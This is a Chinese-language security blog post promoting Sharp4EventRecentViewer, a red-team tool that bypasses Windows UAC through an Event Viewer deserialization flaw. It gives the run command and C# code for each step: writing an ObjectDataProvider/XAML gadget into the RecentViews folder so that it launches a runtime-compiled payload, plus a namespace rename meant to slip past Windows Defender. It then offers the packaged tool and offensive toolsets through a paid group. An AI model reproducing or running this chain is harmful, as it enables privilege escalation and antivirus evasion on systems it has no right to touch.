01
阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02
基本介绍
Sharp4EventRecentViewer是一款红队常用的UAC绕过工具,利用Windows事件查看器的反序列化漏洞,来实现系统命令执行和UAC绕过。本文将详细介绍该工具的使用方式、代码实现,以及其在红队渗透测试中的实际应用。
03
使用方法
在执行Sharp4EventRecentViewer时,只需提供需要执行的命令行参数。例如:
Sharp4EventRecentViewer.exe cmd.exe
工具会自动生成的恶意载荷文件并写入到事件查看器的RecentViews路径。如下图所示。
然后工具自动化模拟用户打开事件查看器,完成触发反序列化漏洞,启动新的CMD进程命令。如下图所示。
04
原理解析
以下是工具的关键代码部分解析,工具首先检查事件查看器的RecentViews文件夹是否存在,并确定该路径为目标路径。
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Microsoft", "Event Viewer", "RecentViews");
Console.WriteLine("Checking if the path "{0}" exists...", path);
通过Environment.GetFolderPath方法获取用户的本地应用数据文件夹,再结合Path.Combine方法确定Event ViewerRecentViews的完整路径。
随后,使用C#代码动态编译一个恶意的可执行文件,其中包含了CreateProcess API调用,用于执行系统命令:
CSharpCodeProvider codeProvider = new CSharpCodeProvider();
CompilerParameters parameters = new CompilerParameters();
parameters.GenerateExecutable = true;
parameters.OutputAssembly = Path.Combine(Path.GetTempPath(), "StartInSelectedDesktop.exe");
string sourceCode = "..."; // 恶意代码(包含CreateProcess调用)
codeProvider.CompileAssemblyFromSource(parameters, new string[] { sourceCode });
此处,利用动态编译功能允许生成随时变更的恶意载荷,提高了工具的灵活性和隐蔽性。之后,工具生成了ObjectDataProvider对象,并将其序列化为XAML字符串
ObjectDataProvider provider = new ObjectDataProvider
{
MethodName = "Start",
ObjectInstance = new Process { StartInfo = new ProcessStartInfo { FileName = outputAssembly } }
};
StringBuilder sb = new StringBuilder();
XmlWriterSettings settings = new XmlWriterSettings { Indent = true };
using (XmlWriter writer = XmlWriter.Create(sb, settings))
{
XamlWriter.Save(provider, writer);
}
string xaml = sb.ToString();
xaml = xaml.Replace("xmlns:sd", "xmlns:sf").Replace("<sd:", "<sf:").Replace("</sd:", "</sf:");
此处,ObjectDataProvider类被用来封装恶意Process对象,将Start方法作为序列化执行目标。通过对XAML文件内容中的sd命名空间进行修改,进一步绕过Windows Defender的检测。当事件查看器加载该文件时,会通过反序列化漏洞执行恶意命令,实现UAC绕过,执行payload。
综上,Sharp4EventRecentViewer充分利用了Windows事件查看器的反序列化漏洞,具备强大的UAC绕过能力。在红队渗透测试中,该工具因其高度隐蔽性和无文件特性而受到广泛应用。工具已经打包在星球,感兴趣的朋友可以加入自取。
05
推荐阅读
从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!
06
欢迎加入.NET安全星球
为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。 星球门票后期价格随着内容和质量的不断沉淀会适当提高,因此越早加入越好!
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
为了助力大家在2024国家级hvv演练中脱颖而出,我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集。
.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输
这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术,更是每一位网络安全爱好者不可或缺的实战利器。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...